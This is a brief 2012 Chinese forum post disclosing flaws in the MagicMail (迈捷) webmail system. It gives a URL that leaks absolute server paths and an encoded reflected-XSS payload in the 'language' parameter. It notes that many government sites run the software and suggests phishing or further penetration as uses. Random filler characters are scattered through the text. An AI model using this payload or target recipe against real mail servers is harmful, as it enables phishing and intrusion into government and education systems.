今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
+ o" h5 {, }; s# s
N, ]! Q0 g, d( }, k5 J5 }3 E) n7 {
$ W+ \+ U) \7 t4 c包含 一个反射性XSS 以及 绝对路径泄漏
+ m! Y: M7 Q! N+ o0 n看了看 貌似全部是linux的。
% J2 v% K/ l5 L3 E" G7 c1 s5 s5 C & ^ m1 f, Q( C) e# E% |
关键字:迈捷邮件系统 by MagicMail0 t, @. v$ B6 W4 n. ^
6 M$ |! u9 y2 D# m) O
可以看到很多政府网站都用这个邮件系统
7 @$ J7 g; a; D0 e) i8 ?) M8 B: O9 H* z" E9 R, K" s
绝对路径 http://madman.in/index.php?login_type=declare&language=& x1 o. |8 e5 I& J% c4 D; a
; `" z9 i+ i6 B, r0 j: v
; X; G+ d/ z! r) y) l4 d+ A) D t0 C/ A+ {: Y3 Q
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E' A( r' N' N9 Y
: }7 j6 ?2 n+ S8 x" V
2 F5 e3 a" U7 m/ l) J
7 k) L# P. _/ i4 p! y& @* k/ j1 X! c( g! ^虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等: k% v" G# g$ P) B
) \! q& G" o2 f, t2 H S* v修复方案:看官方补丁吧。
$ \, O2 w+ `7 Z' x2 H7 V; K: c |
发表于 2012-11-9 20:38:41
收藏
支持
反对